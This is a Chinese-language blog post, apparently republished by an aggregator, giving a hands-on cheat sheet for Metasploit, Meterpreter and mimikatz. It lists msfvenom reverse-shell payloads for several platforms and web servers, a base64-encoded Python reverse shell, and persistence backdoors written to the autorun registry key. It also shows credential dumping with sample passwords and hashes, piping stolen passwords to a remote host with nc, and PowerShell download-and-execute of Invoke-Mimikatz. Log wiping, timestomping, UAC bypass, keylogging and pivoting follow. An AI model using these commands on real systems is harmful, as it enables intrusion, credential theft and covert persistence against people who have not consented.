metasploit framework的一些使用姿势(持续更新)
Posted 思源湖的鱼
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了metasploit framework的一些使用姿势(持续更新)相关的知识,希望对你有一定的参考价值。
前言
记录一些metasploit framework的使用姿势
一、MSF
-p, --payload <payload> 指定需要使用的payload(攻击荷载)
-l, --list [module_type] 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch <architecture> 指定payload的目标架构
--platform <platform> 指定payload的目标平台
-s, --space <length> 设定有效攻击荷载的最大长度
-b, --bad-chars <list> 设定规避字符集,比如: '\\x00\\xff'
-i, --iterations <count> 指定payload的编码次数
-c, --add-code <path> 指定一个附加的win32 shellcode文件
-x, --template <path> 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out <path> 保存payload
-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项
--help-formats 查看msf支持的输出格式列表
1、关于tomcat口令暴力猜解模块
use auxiliary/scanner/http/tomcat_mgr_login
show options
set rhosts 192.168.2.147
set RPORT 8080
run
注意:tomcat默认每个账号登陆5次失败后,账户就会被锁定
2、建立windows反弹shell
1.生成windows反弹shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe
//LHOST为公网IP
//LPORT为反弹端口
//4433.exe为生成文件
2.获取监听IP与端口
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153
msf5 exploit(multi/handler) > set LPORT 4433
msf5 exploit(multi/handler) > run
3.反弹成功
meterpreter > sysinfo
Computer : WIN-UKKED2CCSHJ
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\\padt002
3、msf建立linux反弹shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f elf > payload.elf
//LHOST为公网IP
//LPORT为反弹端口
//4433.exe为生成文件
4、msf建立persistence持久化
Meterpreter的persistence脚本允许注入Meterpreter代理,以确保系统重启之后Meterpreter还能运行。
- 如果是反弹连接方式,可以设置连接攻击机的时间间隔
- 如果是绑定方式,可以设置在指定时间绑定开放端口。
我们运行persistence脚本让系统开机自启动,启动命令为
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105
//Meterpreter(-X),10秒(-i 10) 重连一次,使用端口为6666(-p 6666),连接的目的IP为 192.168.71.105
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WUST-3E75F1D708_20160106.3022/WUST-3E75F1D708_20160106.3022.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.71.105 LPORT=6666
[*] Persistent agent script is 148426 bytes long
[+] Persistent Script written to C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\SIjvSmRq.vbs
[*] Starting connection handler at port 6666 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\SIjvSmRq.vbs
[+] Agent executed with PID 1308
[*] Installing into autorun as HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\DNXmKhNlKXyA
[+] Installed into autorun as HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\DNXmKhNlKXyA
meterpreter >
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 2 opened (192.168.71.105:6666 -> 192.168.71.112:1086) at 2016-01-06 20:30:26 +0800
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.71.112 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter x86/win32 WUST-3E75F1D708\\Administrator @ WUST-3E75F1D708 192.168.71.105:6666 -> 192.168.71.112:1086 (192.168.71.112)
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
自动化的脚本在C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\下
自动化以后下次可以直接在msf下打开会话:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.71.105
lhost => 192.168.71.105
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > run
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 3 opened (192.168.71.105:6666 -> 192.168.71.112:1098) at 2016-01-06 21:05:58 +0800
5、可执行程序
Linux
反向连接:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
正向连接:
msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<Target IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
执行方式:直接复制可执行程序到目标机器上执行就行了。
6、Web Payloads
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
执行方式:将shell.php放在web目录下,使用浏览器访问,或者使用以下命令执行:
php shell.php
7、脚本shell
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
执行方式:复制shell.py中的内容在linux命令行下执行:
python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIxOTIuMTY4Ljg4LjEyOCIgICAgICA7ICAgIHBvcnQ9NDQ0NCAgICAgIDsgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICAgIHMuY29ubmVjdCgoaG9zdCxwb3J0KSkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDEpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMikgICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
8、shellcode
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
想要免杀,还是需要用shellcode。
二、mimikatz
1、获取密码方法
meterpreter > getuid
Server username: NT AUTHORITY\\SYSTEM
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;334101 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;334068 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;996 Negotiate WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO)
0;49101 NTLM n.s. (Credentials KO)
0;999 NTLM WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO)
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP CHENGLEE-PC$
0;49101 NTLM
0;999 NTLM WORKGROUP CHENGLEE-PC$
0;334101 NTLM chenglee-PC chenglee lizhenghua
0;334068 NTLM chenglee-PC chenglee lizhenghua
meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : chenglee-PC
BootKey : 0648ced51b6060bed1a3654e0ee0fd93
Rid : 500
User : Administrator
LM :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
Rid : 501
User : Guest
LM :
NTLM :
Rid : 1000
User : chenglee
LM :
NTLM : 8d0f8e1a18236379538411a9056799f5
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { chenglee ; chenglee-PC ; lizhenghua }
[1] { chenglee ; chenglee-PC ; lizhenghua }
[2] { chenglee ; chenglee-PC ; lizhenghua }
[3] { chenglee ; chenglee-PC ; lizhenghua }
[4] { chenglee-PC ; chenglee ; lizhenghua }
[5] { chenglee-PC ; chenglee ; lizhenghua }
meterpreter >
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; CLOUDVM ; 1244567 }
[1] { Administrator ; CLOUDVM ; 1244567 }
2、非交互式抓取密码
# 1.导出至shash.txt
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> shash.txt
# 2.直接导出到vps,本地无痕迹
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit | nc 192.168.2.134 4444
3、wdigest
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP CHENGLEE-PC$
0;49101 NTLM
0;999 NTLM WORKGROUP CHENGLEE-PC$
0;334101 NTLM chenglee-PC chenglee lizhenghua
0;334068 NTLM chenglee-PC chenglee lizhenghua
4、tspkg
meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP CHENGLEE-PC$
0;49101 NTLM
0;999 NTLM WORKGROUP CHENGLEE-PC$
0;334101 NTLM chenglee-PC chenglee lizhenghua
0;334068 NTLM chenglee-PC chenglee lizhenghua
5、免杀方式
# 1.使用powershell,下载脚本,内存中执行
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
# 2.Procdump + Mimikatz
# procdump 下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
# 先进程导出
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# 再本地还原
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
三、meterpreter基本命令
1、系统命令
基本系统命令
sessions
//sessions –h 查看帮助
sessions -l
//列出当前会话
sessions -i <ID值>
//进入会话
sessions -k
//杀死会话
background
//将当前会话放置后台
run
//执行已有的模块,输入run后按两下tab,列出已有的脚本
info
//查看已有模块信息
getuid
//查看权限
getpid
//获取当前进程的pid
sysinfo
//查看目标机系统信息
ps
//查看当前活跃进程
kill <PID值>
//杀死进程
idletime
//查看目标机闲置时间
reboot
shutdown
//重启/关机
shell
//进入目标机cmd shell
execute执行文件
execute
//在目标机中执行文件
execute -H -i -f cmd.exe
//创建新进程cmd.exe,-H不可见,-i交互
clearev清除日志
clearev #清除windows中的应用程序日志、系统日志、安全日志
2、文件系统命令
基本文件系统命令
getwd
pwd
//查看当前工作目录
ls
//列出当前目录
cd
//跳转目录
search -f *pass*
//搜索文件 -h查看帮助
cat c:\\\\lltest\\\\lltestpasswd.txt
//查看文件内容
upload /tmp/hack.txt C:\\\\lltest
//上传文件到目标机上
download c:\\\\lltest\\\\lltestpasswd.txt /tmp/
//下载文件到本机上
edit c:\\\\1.txt
//编辑或创建文件,没有的话,会新建文件
rm C:\\\\lltest\\\\hack.txt
//删除文件
mkdir lltest2
//只能在当前目录下创建文件夹
rmdir lltest2
//只能删除当前目录下文件夹
getlwd
lpwd
//操作攻击者主机 查看当前目录
lcd /tmp
//操作攻击者主机 切换目录
timestomp伪造时间戳
timestomp C:// -h
//查看帮助
timestomp -v C://2.txt
//查看时间戳
timestomp C://2.txt -f C://1.txt
//将1.txt的时间戳复制给2.txt
3、网络命令
# 基本
ipconfig/ifconfig
netstat –ano
arp
getproxy #查看代理信息
route #查看路由
# portfwd端口转发
portfwd add -l 6666 -p 3389 -r 127.0.0.1 # 将目标机的3389端口转发到本地6666端口
rdesktop -u Administrator -p ichunqiu 127.0.0.1:4444 #然后使用rdesktop来连接,-u 用户名 -p 密码
# autoroute添加路由
run autoroute –h #查看帮助
run autoroute -s 192.168.2.0/24 #添加到目标环境网络
run autoroute –p #查看添加的路由
# 然后可以利用arp_scanner、portscan等进行扫描
run arp_scanner -r 192.168.2.0/24
run post/multi/gather/ping_sweep RHOSTS=192.168.2.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.2.0
# autoroute添加完路由后,还可以利用msf自带的模块进行socks代理
# msf提供了3个模块用来做socks代理。
# auxiliary/server/socks4a
# use auxiliary/server/socks5
# use auxiliary/server/socks_unc
# 先background退出来,然后:
use auxiliary/server/socks4a
set srvhost 127.0.0.1
set srvport 1080
run
# 然后vi /etc/proxychains.conf #添加 socks4 127.0.0.1 1080
# 最后proxychains 使用Socks4a代理访问
# sniffer抓包
use sniffer
sniffer_interfaces #查看网卡
sniffer_start 2 #选择网卡 开始抓包
sniffer_stats 2 #查看状态
sniffer_dump 2 /tmp/lltest.pcap #导出pcap数据包
sniffer_stop 2 #停止抓包
4、提权
(1)getsystem
getsystem
getsystem工作原理:
- getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。
- getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。
- Windows服务已启动,导致与命名管道建立连接。
- 该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。
- 然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。
(2)bypassuac
用户帐户控制(UAC)是微软在 Windows Vista 以后版本引入的一种安全机制,有助于防止对系统进行未经授权的更改。应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员专门给系统授予管理员级别的访问权限。UAC 可以阻止未经授权的应用程序进行自动安装,并防止无意中更改系统设置。
msf提供了如下几个模块帮助绕过UAC:
msf5 auxiliary(server/socks5) > search bypassuac
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass
1 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
2 exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
3 exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key)
4 exploit/windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection)
5 exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
6 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack)
7 exploit/windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
使用方法类似,运行后返回一个新的会话,需要再次执行getsystem获取系统权限
# 示例
meterpreter > getuid
Server username: SAUCERMAN\\TideSec
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac
msf5 exploit(windows/local/bypassuac) > set SESSION 4
SESSION => 4
msf5 exploit(windows/local/bypassuac) > run
[-] Handler failed to bind to 192.168.81.160:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (206403 bytes) to 192.168.81.154
[*] Meterpreter session 5 opened (192.168.81.160:4444 -> 192.168.81.154:1134) at 2019-06-12 06:31:11 -0700
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.
# 然后返回新的meterpreter会话,继续执行getsystem本应该会提权成功
# 然鹅这里失败了
(3)内核漏洞提权
无论是linux还是windows都出过很多高危的漏洞,我们可以利用它们进行权限提升,比如windows系统的ms13-081、ms15-051、ms16-032、ms17-010等,msf也集成了这些漏洞的利用模块。
meterpreter > run post/windows/gather/enum_patches #查看补丁信息
msf5 > use exploit/windows/local/ms13_053_schlamperei
msf5 > set SESSION 2
msf5 > exploit
# 示例
meterpreter > run post/windows/gather/enum_patches
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(windows/local/bypassuac) > search MS13-081
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/ms13_081_track_popup_menu 2013-10-08 average Yes Windows TrackPopupMenuEx Win32k NULL Page
msf5 exploit(windows/local/bypassuac) > use exploit/windows/local/ms13_081_track_popup_menu
msf5 exploit(windows/local/ms13_081_track_popup_menu) > set session 4
session => 4
msf5 exploit(windows/local/ms13_081_track_popup_menu) > exploit
[!] SESSION may not be compatible with this module.
[-] Handler failed to bind to 192.168.81.160:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Exploit aborted due to failure: no-target: Running against 64-bit systems is not supported
[*] Exploit completed, but no session was created.
# 然鹅失败了,摸摸头
5、远程桌面&截屏
enumdesktops
//查看可用的桌面
getdesktop
//获取当前meterpreter 关联的桌面
set_desktop
//设置meterpreter关联的桌面 -h查看帮助
screenshot
//截屏
use espia
//或者使用espia模块截屏 然后输入screengrab
run vnc
//使用vnc远程桌面连接
getgui命令
run getgui –h
//查看帮助
run getgui -e
//开启远程桌面
run getgui -u lltest2 -p 123456
//添加用户
run getgui -f 6661 –e
//389端口转发到6661
getgui 系统不推荐,推荐使用run post/windows/manage/enable_rdp
getgui添加用户时,有时虽然可以成功添加用户,但是没有权限通过远程桌面登陆
enable_rdp脚本
run post/windows/manage/enable_rdp
//开启远程桌面
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456
//添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662
//将3389端口转发到6662
脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net user添加;端口转发是利用的portfwd命令
6、键盘记录
keyscan_start
//开始键盘记录
keyscan_dump
//导出记录数据
keyscan_stop
//结束键盘记录
7、信息收集
# 信息收集的脚本位于:
# modules/post/windows/gather
# modules/post/linux/gather
# 以下列举一些常用的
run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks #获取最近的文件操作
run post/windows/gather/enum_ie #获取IE缓存
run post/windows/gather/enum_chrome #获取Chrome缓存
run post/windows/gather/enum_patches #补丁信息
run post/windows/gather/enum_domain #查找域控
8、哈希利用-获取哈希
run post/windows/gather/smart_hashdump
//从SAM导出密码哈希,需要SYSTEM权限
9、获取凭证
在内网环境中,一个管理员可能管理多台服务器,他使用的密码有可能相同或者有规律,如果能够得到密码或者hash,再尝试登录内网其它服务器,可能取得意想不到的效果。
(1)使用mimikatz
load mimikatz #help mimikatz 查看帮助
wdigest #获取Wdigest密码
mimikatz_command -f samdump::hashes #执行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords
# 示例
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > wdigest
[!] Not currently running as SYSTEM
[*] Attempting to getprivs ...
[+] Got SeDebugPrivilege.
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP SAUCERMAN$
0;48748 NTLM
0;999 NTLM WORKGROUP SAUCERMAN$
0;476238 NTLM SAUCERMAN TideSec 123456
0;476209 NTLM SAUCERMAN TideSec 123456
meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : saucerman
BootKey : 691cff33caf49e933be97fcee370256a
RegOpenKeyEx SAM : (0x00000005) �ݿ�
Erreur lors de l'exploration du registre
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { TideSec ; SAUCERMAN ; 123456 }
[1] { TideSec ; SAUCERMAN ; 123456 }
[2] { SAUCERMAN ; TideSec ; 123456 }
[3] { SAUCERMAN ; TideSec ; 123456 }
[4] { TideSec ; SAUCERMAN ; 123456 }
[5] { TideSec ; SAUCERMAN ; 123456 }
(2)使用meterpreter的run hashdump命令
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 691cff33caf49e933be97fcee370256a...
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:268: warning: constant OpenSSL::Cipher::Cipher is deprecated
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:272: warning: constant OpenSSL::Cipher::Cipher is deprecated
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:279: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Dumping password hints...
TideSec:"123456"
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
(3)post/windows/gather/smart\\_hashdump
从上面也可以看出官方推荐post/windows/gather/smart_hashdump
meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against SAUCERMAN
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file以上是关于metasploit framework的一些使用姿势(持续更新)的主要内容,如果未能解决你的问题,请参考以下文章
metasploit framework怎么启动msfrpcd服务
metasploit framework上怎么使用whois命令
Win10 如何下载安装Metasploit-framework6.2
Win10 如何下载安装Metasploit-framework6.2